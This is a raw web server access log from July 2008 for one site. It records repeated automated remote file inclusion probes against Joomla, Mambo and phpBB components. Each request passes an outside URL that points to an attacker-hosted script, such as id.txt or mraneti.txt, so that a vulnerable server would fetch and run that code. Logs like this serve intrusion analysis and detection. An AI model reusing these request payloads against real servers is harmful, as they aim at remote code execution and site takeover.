207.210.115.114 - - [26/Jul/2008:05:18:42 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:18:42 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:18:42 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:19:15 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:19:15 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
85.109.76.232 - - [26/Jul/2008:05:19:38 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/php%2Did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
85.109.76.232 - - [26/Jul/2008:05:19:39 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/php%2Did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
85.109.76.232 - - [26/Jul/2008:05:19:39 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/php%2Did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
85.109.76.232 - - [26/Jul/2008:05:20:13 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/php%2Did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
85.109.76.232 - - [26/Jul/2008:05:20:13 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/php%2Did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:20:32 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:20:33 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:20:33 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:20:33 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:20:33 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:20:34 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
89.200.152.10 - - [26/Jul/2008:05:20:48 -0700] "GET /logs/access.log/errors.php?error=http://www.freewebs.com/albgroup/r1d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.200.152.10 - - [26/Jul/2008:05:20:48 -0700] "GET /errors.php?error=http://www.freewebs.com/albgroup/r1d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.200.152.10 - - [26/Jul/2008:05:20:48 -0700] "GET /logs/errors.php?error=http://www.freewebs.com/albgroup/r1d.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
62.213.78.149 - - [26/Jul/2008:05:21:24 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/jempiak/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
89.188.110.30 - - [26/Jul/2008:05:21:50 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.geocities.com/jempiak/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:22:08 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/it.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:22:12 -0700] "GET /logs/access.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:22:12 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
205.234.197.96 - - [26/Jul/2008:05:22:12 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
85.234.133.173 - - [26/Jul/2008:05:22:20 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:27 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:28 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:28 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:30 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:30 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:30 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:30 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:30 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:30 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:45 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:45 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:46 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:22:49 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:22:49 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:22:49 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:22:54 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
212.227.101.81 - - [26/Jul/2008:05:22:55 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:22:59 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:23:00 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:23:00 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:23:04 -0700] "GET /logs/access_080716.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:23:04 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:23:04 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:23:10 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:23:10 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
85.109.76.232 - - [26/Jul/2008:05:23:27 -0700] "GET /logs/access_080717.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.freewebs.com/albgroup/php%2Did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:24:02 -0700] "GET /logs/access_080717.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:24:02 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:24:02 -0700] "GET /logs/access_080717.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:24:03 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:07 -0700] "GET /logs/access.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:08 -0700] "GET /index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:08 -0700] "GET /logs/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:24:11 -0700] "GET /logs/access_080716.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:24:11 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
216.40.222.226 - - [26/Jul/2008:05:24:11 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:24:15 -0700] "GET /logs/access_080716.log//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:24:15 -0700] "GET //?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
207.44.230.33 - - [26/Jul/2008:05:24:15 -0700] "GET //components/com_thopper/inc/contact_type.php?redirhttp://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
65.182.184.197 - - [26/Jul/2008:05:24:16 -0700] "GET /logs//?mosConfig_absolute_path=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 200 1658 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:17 -0700] "GET /logs/access_080716.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:17 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:18 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:18 -0700] "GET /logs/access_080716.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:18 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:18 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:24:19 -0700] "GET /logs/access_080717.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:24:19 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
201.130.79.130 - - [26/Jul/2008:05:24:20 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:20 -0700] "GET /logs/access_080716.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:20 -0700] "GET /logs/access_080716.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:20 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:20 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:20 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:20 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:20 -0700] "GET /logs/access_080716.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:24:20 -0700] "GET /logs/access_080717.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:20 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:21 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:24:21 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:24:21 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:24:21 -0700] "GET /logs/access_080717.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:24:21 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
70.84.182.98 - - [26/Jul/2008:05:24:21 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:24 -0700] "GET /logs/access_080716.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:25 -0700] "GET /logs/access_080716.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:25 -0700] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:25 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:24:37 -0700] "GET /logs/access_080717.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:24:38 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
200.11.67.242 - - [26/Jul/2008:05:24:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.hellionindustries.com"
207.210.115.114 - - [26/Jul/2008:05:24:52 -0700] "GET /logs/access.log/index.php?configFile=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.hellionindustries.com"
